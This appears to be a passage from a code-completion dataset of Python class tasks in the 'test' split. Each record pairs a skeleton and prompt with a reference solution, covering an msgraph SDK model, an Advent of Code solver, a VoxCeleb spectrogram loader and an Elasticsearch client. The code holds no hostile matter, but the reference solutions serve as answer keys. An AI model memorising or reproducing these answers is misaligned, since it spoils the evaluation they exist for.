create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DeviceEnrollmentConfiguration:\n \"\"\"The Base Class of Device Enrollment Configuration\"\"\"\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration\"\"\"\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n try:\n mapping_value = parse_node.get_child_node('@odata.type').get_str_value()\n except AttributeError:\n mapping_value = None\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentLimitConfiguration'.casefold():\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n return DeviceEnrollmentLimitConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentPlatformRestrictionsConfiguration'.casefold():\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n return DeviceEnrollmentPlatformRestrictionsConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentWindowsHelloForBusinessConfiguration'.casefold():\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n return DeviceEnrollmentWindowsHelloForBusinessConfiguration()\n return DeviceEnrollmentConfiguration()\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'assignments': lambda n: setattr(self, 'assignments', n.get_collection_of_object_values(EnrollmentConfigurationAssignment)), 'createdDateTime': lambda n: setattr(self, 'created_date_time', n.get_datetime_value()), 'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'priority': lambda n: setattr(self, 'priority', n.get_int_value()), 'version': lambda n: setattr(self, 'version', n.get_int_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_collection_of_object_values('assignments', self.assignments)\n writer.write_datetime_value('createdDateTime', self.created_date_time)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_int_value('priority', self.priority)\n writer.write_int_value('version', self.version)\n", "source": "the_stack_v2_python_sparse", "source_path": "msgraph/generated/models/device_enrollment_configuration.py", "source_repo": "microsoftgraph/msgraph-sdk-python", "split": "test", "star_events_count": 135} {"blob_id": "64e25d923b0cb98d7949b97099008f1e7cc7dbd2", "bodies": ["b1, b2 = parse(filename)\nb2 = np.array(b2, dtype=np.int16)\nb2 = np.pad(b2, (4, 4), 'constant', constant_values=(0, 0))\nb2 = enhance(b1, b2)\nb2 = enhance(b1, b2)\nreturn np.count_nonzero(b2)", "data = parse(filename)\nb1, b2 = parse(filename)\nb2 = np.array(b2, dtype=np.int16)\nb2 = np.pad(b2, (3, 3), 'constant', constant_values=(0, 0))\nfor _ in range(50):\n b2 = enhance(b1, b2)\n pad = b2[0][0]\n b2 = np.pad(b2, (2, 2), 'constant', constant_values=(pad, pad))\nreturn np.count_nonzero(b2)"], "bodies_text": "<|body_start_0|>\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (4, 4), 'constant', constant_values=(0, 0))\n b2 = enhance(b1, b2)\n b2 = enhance(b1, b2)\n return np.count_nonzero(b2)\n<|end_body_0|>\n\n<|body_start_1|>\n data = parse(filename)\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (3, 3), 'constant', constant_values=(0, 0))\n for _ in range(50):\n b2 = enhance(b1, b2)\n pad = b2[0][0]\n b2 = np.pad(b2, (2, 2), 'constant', constant_values=(pad, pad))\n return np.count_nonzero(b2)\n<|end_body_1|>\n", "class_docstring": "AoC 2021 Day 20", "class_name": "Day20", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Day20:\n \"\"\"AoC 2021 Day 20\"\"\"\n\n def part1(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 1\"\"\"\n <|body_0|>\n\n def part2(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 2\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (4, 4), 'constant', constant_values=(0, 0))\n b2 = enhance(b1, b2)\n b2 = enhance(b1, b2)\n return np.count_nonzero(b2)\n<|end_body_0|>\n\n<|body_start_1|>\n data = parse(filename)\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (3, 3), 'constant', constant_values=(0, 0))\n for _ in range(50):\n b2 = enhance(b1, b2)\n pad = b2[0][0]\n b2 = np.pad(b2, (2, 2), 'constant', constant_values=(pad, pad))\n return np.count_nonzero(b2)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000358", "length_bytes": 1992, "license_type": "no_license", "methods": [{"docstring": "Given a filename, solve 2021 day 20 part 1", "name": "part1", "signature": "def part1(filename: str) -> int"}, {"docstring": "Given a filename, solve 2021 day 20 part 2", "name": "part2", "signature": "def part2(filename: str) -> int"}], "n_methods": 2, "prompt": "Implement the Python class `Day20` described below.\n\nClass description:\nAoC 2021 Day 20\n\nMethod signatures and docstrings:\n- def part1(filename: str) -> int: Given a filename, solve 2021 day 20 part 1\n- def part2(filename: str) -> int: Given a filename, solve 2021 day 20 part 2", "prompted_full_text": "Implement the Python class `Day20` described below.\n\nClass description:\nAoC 2021 Day 20\n\nMethod signatures and docstrings:\n- def part1(filename: str) -> int: Given a filename, solve 2021 day 20 part 1\n- def part2(filename: str) -> int: Given a filename, solve 2021 day 20 part 2\n\n<|skeleton|>\nclass Day20:\n \"\"\"AoC 2021 Day 20\"\"\"\n\n def part1(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 1\"\"\"\n <|body_0|>\n\n def part2(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 2\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (4, 4), 'constant', constant_values=(0, 0))\n b2 = enhance(b1, b2)\n b2 = enhance(b1, b2)\n return np.count_nonzero(b2)\n<|end_body_0|>\n\n<|body_start_1|>\n data = parse(filename)\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (3, 3), 'constant', constant_values=(0, 0))\n for _ in range(50):\n b2 = enhance(b1, b2)\n pad = b2[0][0]\n b2 = np.pad(b2, (2, 2), 'constant', constant_values=(pad, pad))\n return np.count_nonzero(b2)\n<|end_body_1|>\n", "revision_id": "e89db235837d2d05848210a18c9c2a4456085570", "skeleton": "<|skeleton|>\nclass Day20:\n \"\"\"AoC 2021 Day 20\"\"\"\n\n def part1(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 1\"\"\"\n <|body_0|>\n\n def part2(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 2\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Day20:\n \"\"\"AoC 2021 Day 20\"\"\"\n\n def part1(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 1\"\"\"\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (4, 4), 'constant', constant_values=(0, 0))\n b2 = enhance(b1, b2)\n b2 = enhance(b1, b2)\n return np.count_nonzero(b2)\n\n def part2(filename: str) -> int:\n \"\"\"Given a filename, solve 2021 day 20 part 2\"\"\"\n data = parse(filename)\n b1, b2 = parse(filename)\n b2 = np.array(b2, dtype=np.int16)\n b2 = np.pad(b2, (3, 3), 'constant', constant_values=(0, 0))\n for _ in range(50):\n b2 = enhance(b1, b2)\n pad = b2[0][0]\n b2 = np.pad(b2, (2, 2), 'constant', constant_values=(pad, pad))\n return np.count_nonzero(b2)\n", "source": "the_stack_v2_python_sparse", "source_path": "2021/python2021/aoc/day20.py", "source_repo": "mreishus/aoc", "split": "test", "star_events_count": 16} {"blob_id": "b7ae12437727c5f89d006f643674c018db505e04", "bodies": ["audio = np.empty((1,))\nsecs_loaded = 0\nfiles_loaded = 0\nfiles = glob.glob(path + '*.wav')\nfor file in files:\n sr, samples = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if secs_loaded >= secs:\n break\n if not concat:\n break\ntotal_samples = int(round(secs * sr))\nif total_samples > len(audio):\n warnings.warn('Found fewer than %.2f seconds of audio. Returning %.2f seconds of audio.' % (secs, len(audio) / sr))\naudio = audio[0:total_samples]\nself.audio = audio\nself.sampling_rate = sr", "nperseg = round(int(seg_length * self.sampling_rate))\nnoverlap = round(int(nperseg * overlap))\nspectrogram_kwargs['fs'] = self.sampling_rate\nspectrogram_kwargs['nperseg'] = nperseg\nspectrogram_kwargs['noverlap'] = noverlap\n_, _, S = signal.spectrogram(self.audio, **spectrogram_kwargs)\nif normalize:\n scaler = preprocessing.StandardScaler(with_mean=False)\n S = scaler.fit_transform(S.T).T\nreturn (S, self.audio)"], "bodies_text": "<|body_start_0|>\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + '*.wav')\n for file in files:\n sr, samples = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if secs_loaded >= secs:\n break\n if not concat:\n break\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn('Found fewer than %.2f seconds of audio. Returning %.2f seconds of audio.' % (secs, len(audio) / sr))\n audio = audio[0:total_samples]\n self.audio = audio\n self.sampling_rate = sr\n<|end_body_0|>\n\n<|body_start_1|>\n nperseg = round(int(seg_length * self.sampling_rate))\n noverlap = round(int(nperseg * overlap))\n spectrogram_kwargs['fs'] = self.sampling_rate\n spectrogram_kwargs['nperseg'] = nperseg\n spectrogram_kwargs['noverlap'] = noverlap\n _, _, S = signal.spectrogram(self.audio, **spectrogram_kwargs)\n if normalize:\n scaler = preprocessing.StandardScaler(with_mean=False)\n S = scaler.fit_transform(S.T).T\n return (S, self.audio)\n<|end_body_1|>\n", "class_docstring": "Spectrogram data from the Vox Celeb Dataset.", "class_name": "VoxCeleb", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VoxCeleb:\n \"\"\"Spectrogram data from the Vox Celeb Dataset.\"\"\"\n\n def __init__(self, secs, path, concat=True):\n \"\"\"Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.\"\"\"\n <|body_0|>\n\n def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs):\n \"\"\"Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). Returns ------- S : array Spectrogram audio : array Raw audio samples\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + '*.wav')\n for file in files:\n sr, samples = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if secs_loaded >= secs:\n break\n if not concat:\n break\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn('Found fewer than %.2f seconds of audio. Returning %.2f seconds of audio.' % (secs, len(audio) / sr))\n audio = audio[0:total_samples]\n self.audio = audio\n self.sampling_rate = sr\n<|end_body_0|>\n\n<|body_start_1|>\n nperseg = round(int(seg_length * self.sampling_rate))\n noverlap = round(int(nperseg * overlap))\n spectrogram_kwargs['fs'] = self.sampling_rate\n spectrogram_kwargs['nperseg'] = nperseg\n spectrogram_kwargs['noverlap'] = noverlap\n _, _, S = signal.spectrogram(self.audio, **spectrogram_kwargs)\n if normalize:\n scaler = preprocessing.StandardScaler(with_mean=False)\n S = scaler.fit_transform(S.T).T\n return (S, self.audio)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000359", "length_bytes": 3492, "license_type": "no_license", "methods": [{"docstring": "Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.", "name": "__init__", "signature": "def __init__(self, secs, path, concat=True)"}, {"docstring": "Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). Returns ------- S : array Spectrogram audio : array Raw audio samples", "name": "generate", "signature": "def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001657", "prompt": "Implement the Python class `VoxCeleb` described below.\n\nClass description:\nSpectrogram data from the Vox Celeb Dataset.\n\nMethod signatures and docstrings:\n- def __init__(self, secs, path, concat=True): Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.\n- def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs): Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). Returns ------- S : array Spectrogram audio : array Raw audio samples", "prompted_full_text": "Implement the Python class `VoxCeleb` described below.\n\nClass description:\nSpectrogram data from the Vox Celeb Dataset.\n\nMethod signatures and docstrings:\n- def __init__(self, secs, path, concat=True): Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.\n- def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs): Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). Returns ------- S : array Spectrogram audio : array Raw audio samples\n\n<|skeleton|>\nclass VoxCeleb:\n \"\"\"Spectrogram data from the Vox Celeb Dataset.\"\"\"\n\n def __init__(self, secs, path, concat=True):\n \"\"\"Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.\"\"\"\n <|body_0|>\n\n def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs):\n \"\"\"Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). Returns ------- S : array Spectrogram audio : array Raw audio samples\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + '*.wav')\n for file in files:\n sr, samples = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if secs_loaded >= secs:\n break\n if not concat:\n break\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn('Found fewer than %.2f seconds of audio. Returning %.2f seconds of audio.' % (secs, len(audio) / sr))\n audio = audio[0:total_samples]\n self.audio = audio\n self.sampling_rate = sr\n<|end_body_0|>\n\n<|body_start_1|>\n nperseg = round(int(seg_length * self.sampling_rate))\n noverlap = round(int(nperseg * overlap))\n spectrogram_kwargs['fs'] = self.sampling_rate\n spectrogram_kwargs['nperseg'] = nperseg\n spectrogram_kwargs['noverlap'] = noverlap\n _, _, S = signal.spectrogram(self.audio, **spectrogram_kwargs)\n if normalize:\n scaler = preprocessing.StandardScaler(with_mean=False)\n S = scaler.fit_transform(S.T).T\n return (S, self.audio)\n<|end_body_1|>\n", "revision_id": "eabdb6ca44cb8f44f0cfb2d94561c9d4de9bb413", "skeleton": "<|skeleton|>\nclass VoxCeleb:\n \"\"\"Spectrogram data from the Vox Celeb Dataset.\"\"\"\n\n def __init__(self, secs, path, concat=True):\n \"\"\"Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.\"\"\"\n <|body_0|>\n\n def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs):\n \"\"\"Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). Returns ------- S : array Spectrogram audio : array Raw audio samples\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VoxCeleb:\n \"\"\"Spectrogram data from the Vox Celeb Dataset.\"\"\"\n\n def __init__(self, secs, path, concat=True):\n \"\"\"Create a VoxCeleb dataset object. Parameters ---------- secs : int Number of seconds of the dataset to be generated. Multiple .wav files will be combined if necessary. path : string Path to folder containing .wav file(s) concat : bool Whether or not to concatenate multiple files. If false, only the first file in the directory will be used.\"\"\"\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + '*.wav')\n for file in files:\n sr, samples = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if secs_loaded >= secs:\n break\n if not concat:\n break\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn('Found fewer than %.2f seconds of audio. Returning %.2f seconds of audio.' % (secs, len(audio) / sr))\n audio = audio[0:total_samples]\n self.audio = audio\n self.sampling_rate = sr\n\n def generate(self, seg_length=0.02, overlap=0.3, normalize=True, **spectrogram_kwargs):\n \"\"\"Generate spectrogram from collected audio samples. Parameters ---------- seg_length : float Length of FFT segment (in seconds) for computing the spectrogram. Defaults to 20 milliseconds. overlap : float Float between 0 and 1 specifying the fraction of segments which should overlap. Defaults to 0.3. normalize : boolean If true, divide each frequency bin by its standard deviation. spectrogram_kwargs : keyword arguments Optional arguments to scipy.signal.spectrogram(). Note that these keyword arguments should not contain noverlap, nseg, fs, or return_onesided, as these are specified directly as parameters to generate(). Returns ------- S : array Spectrogram audio : array Raw audio samples\"\"\"\n nperseg = round(int(seg_length * self.sampling_rate))\n noverlap = round(int(nperseg * overlap))\n spectrogram_kwargs['fs'] = self.sampling_rate\n spectrogram_kwargs['nperseg'] = nperseg\n spectrogram_kwargs['noverlap'] = noverlap\n _, _, S = signal.spectrogram(self.audio, **spectrogram_kwargs)\n if normalize:\n scaler = preprocessing.StandardScaler(with_mean=False)\n S = scaler.fit_transform(S.T).T\n return (S, self.audio)\n", "source": "the_stack_v2_python_sparse", "source_path": "cmfpy/datasets/vox_celeb.py", "source_repo": "degleris1/cmfpy", "split": "test", "star_events_count": 1} {"blob_id": "092fcb63eadda58ea620701802e49bfe0340abbb", "bodies": ["__path = '/_features'\n__query: t.Dict[str, t.Any] = {}\nif error_trace is not None:\n __query['error_trace'] = error_trace\nif filter_path is not None:\n __query['filter_path'] = filter_path\nif human is not None:\n __query['human'] = human\nif pretty is not None:\n __query['pretty'] = pretty\n__headers = {'accept': 'application/json'}\nreturn await self.perform_request('GET', __path, params=__query, headers=__headers)", "__path = '/_features/_reset'\n__query: t.Dict[str, t.Any] = {}\nif error_trace is not None:\n __query['error_trace'] = error_trace\nif filter_path is not None:\n __query['filter_path'] = filter_path\nif human is not None:\n __query['human'] = human\nif pretty is not None:\n __query['pretty'] = pretty\n__headers = {'accept': 'application/json'}\nreturn await self.perform_request('POST', __path, params=__query, headers=__headers)"], "bodies_text": "<|body_start_0|>\n __path = '/_features'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('GET', __path, params=__query, headers=__headers)\n<|end_body_0|>\n\n<|body_start_1|>\n __path = '/_features/_reset'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('POST', __path, params=__query, headers=__headers)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "FeaturesClient", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference", "LicenseRef-scancode-generic-cla"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FeaturesClient:\n\n async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_\"\"\"\n <|body_0|>\n\n async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Resets the internal state of features, usually by deleting system indices ``_\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n __path = '/_features'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('GET', __path, params=__query, headers=__headers)\n<|end_body_0|>\n\n<|body_start_1|>\n __path = '/_features/_reset'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('POST', __path, params=__query, headers=__headers)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000360", "length_bytes": 3309, "license_type": "permissive", "methods": [{"docstring": "Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_", "name": "get_features", "signature": "async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]"}, {"docstring": "Resets the internal state of features, usually by deleting system indices ``_", "name": "reset_features", "signature": "async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004846", "prompt": "Implement the Python class `FeaturesClient` described below.\n\nClass description:\nImplement the FeaturesClient class.\n\nMethod signatures and docstrings:\n- async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]: Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_\n- async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]: Resets the internal state of features, usually by deleting system indices ``_", "prompted_full_text": "Implement the Python class `FeaturesClient` described below.\n\nClass description:\nImplement the FeaturesClient class.\n\nMethod signatures and docstrings:\n- async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]: Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_\n- async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]: Resets the internal state of features, usually by deleting system indices ``_\n\n<|skeleton|>\nclass FeaturesClient:\n\n async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_\"\"\"\n <|body_0|>\n\n async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, 